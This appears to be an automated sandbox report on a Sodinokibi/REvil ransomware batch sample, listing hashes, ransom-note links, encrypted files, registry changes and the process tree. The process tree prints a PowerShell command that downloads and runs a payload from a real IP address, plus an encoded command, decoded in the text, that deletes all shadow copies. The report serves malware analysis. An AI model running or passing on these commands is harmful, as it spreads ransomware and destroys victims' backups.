Analysis
- max time kernel: 51s
- max time network: 62s
- platform: windows7_x64
- resource: win7v200722
- submitted: 26-07-2020 15:10
Static task: static1
Behavioral task: behavioral1
- Sample: 4eb6ba5ba6c21ac7744e462c7de7df9a.bat
- Resource: win7v200722
Behavioral task: behavioral2
- Sample: 4eb6ba5ba6c21ac7744e462c7de7df9a.bat
- Resource: win10
General
- Target: 4eb6ba5ba6c21ac7744e462c7de7df9a.bat
- Size: 213B
- MD5: c706ae9c80ccdfa7c936b7c8df7cfa76
- SHA1: 5ec96eaf49a1004e20f9be597ef6c78b7bf69e55
- SHA256: b3a094f34f9fb134e07a2e0b414bcbf01c2097dd4b14f98127ecdeb46343d4cc
- SHA512: 6299207c06345ea343eadff3fb433da135526d9410b863388597cf41c8fb91313a78509c7c69aae221f083a90cc6347a1d31642bbdfc3ac7c8dc5a5188d01ff6
Malware Config
Extracted (download URL):
- http://185.103.242.78/pastes/4eb6ba5ba6c21ac7744e462c7de7df9a
Extracted (ransom note C:\4nl5390x43-readme.txt):
- Family: sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5A83B5160AE50FC5
- http://decryptor.cc/5A83B5160AE50FC5
Signatures

Suspicious use of WriteProcessMemory (8 IoCs)
Processes: cmd.exe, powershell.exe
description | pid | process | target process
PID 1080 wrote to memory of 1408 | 1080 | cmd.exe | powershell.exe
PID 1080 wrote to memory of 1408 | 1080 | cmd.exe | powershell.exe
PID 1080 wrote to memory of 1408 | 1080 | cmd.exe | powershell.exe
PID 1080 wrote to memory of 1408 | 1080 | cmd.exe | powershell.exe
PID 1408 wrote to memory of 1072 | 1408 | powershell.exe | powershell.exe
PID 1408 wrote to memory of 1072 | 1408 | powershell.exe | powershell.exe
PID 1408 wrote to memory of 1072 | 1408 | powershell.exe | powershell.exe
PID 1408 wrote to memory of 1072 | 1408 | powershell.exe | powershell.exe
Enumerates connected drives (3 TTPs)

Drops file in Program Files directory (25 IoCs)
Processes: powershell.exe
description | ioc | process
File created | \??\c:\program files\4nl5390x43-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\BlockExpand.dxf | powershell.exe
File opened for modification | \??\c:\program files\DenyUndo.bmp | powershell.exe
File opened for modification | \??\c:\program files\FindEnter.xml | powershell.exe
File opened for modification | \??\c:\program files\ReadWait.i64 | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\4nl5390x43-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\UnregisterSubmit.potx | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\4nl5390x43-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\RemoveUnprotect.aif | powershell.exe
File opened for modification | \??\c:\program files\SendCopy.xlt | powershell.exe
File opened for modification | \??\c:\program files\SendDisconnect.eps | powershell.exe
File opened for modification | \??\c:\program files\SubmitWrite.wma | powershell.exe
File opened for modification | \??\c:\program files\TestFormat.bmp | powershell.exe
File opened for modification | \??\c:\program files\UnregisterDisable.3g2 | powershell.exe
File opened for modification | \??\c:\program files\CompleteSelect.xlsb | powershell.exe
File opened for modification | \??\c:\program files\DismountAssert.snd | powershell.exe
File opened for modification | \??\c:\program files\FormatMount.m4a | powershell.exe
File opened for modification | \??\c:\program files\OptimizeDisconnect.wmf | powershell.exe
File opened for modification | \??\c:\program files\ResetConvertTo.ex_ | powershell.exe
File opened for modification | \??\c:\program files\UnregisterPing.mpeg3 | powershell.exe
File created | \??\c:\program files (x86)\4nl5390x43-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\ConvertFromPublish.fon | powershell.exe
File opened for modification | \??\c:\program files\SaveRename.vstx | powershell.exe
File opened for modification | \??\c:\program files\SuspendConvertFrom.wmf | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\4nl5390x43-readme.txt | powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\91txmrvnxdk8l.bmp" | powershell.exe

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
pid | process
1408 | powershell.exe

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
description | pid | process
Token: SeDebugPrivilege | 1408 | powershell.exe
Token: SeDebugPrivilege | 1408 | powershell.exe
Token: SeDebugPrivilege | 1072 | powershell.exe
Token: SeBackupPrivilege | 1872 | vssvc.exe
Token: SeRestorePrivilege | 1872 | vssvc.exe
Token: SeAuditPrivilege | 1872 | vssvc.exe
Token: SeTakeOwnershipPrivilege | 1408 | powershell.exe

Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe
pid | process
1408 | powershell.exe
1408 | powershell.exe
1408 | powershell.exe
1072 | powershell.exe
1072 | powershell.exe

Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
flow | pid | process
3 | 1408 | powershell.exe
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe

Modifies extensions of user files (3 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes: powershell.exe
description | ioc | process
File renamed | C:\Users\Admin\Pictures\SplitShow.crw => \??\c:\users\admin\pictures\SplitShow.crw.4nl5390x43 | powershell.exe
File renamed | C:\Users\Admin\Pictures\UnblockSelect.crw => \??\c:\users\admin\pictures\UnblockSelect.crw.4nl5390x43 | powershell.exe
File renamed | C:\Users\Admin\Pictures\ExpandUpdate.raw => \??\c:\users\admin\pictures\ExpandUpdate.raw.4nl5390x43 | powershell.exe
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\4eb6ba5ba6c21ac7744e462c7de7df9a.bat"
  PID: 1080
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4eb6ba5ba6c21ac7744e462c7de7df9a');Invoke-BUSJHY;Start-Sleep -s 10000"
    PID: 1408
    - Suspicious use of WriteProcessMemory
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is base64-encoded UTF-16LE; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}. This is the shadow-copy deletion step that explains the vssvc.exe activity and the SeBackupPrivilege/SeRestorePrivilege tokens recorded above.)
      PID: 1072
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1872
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service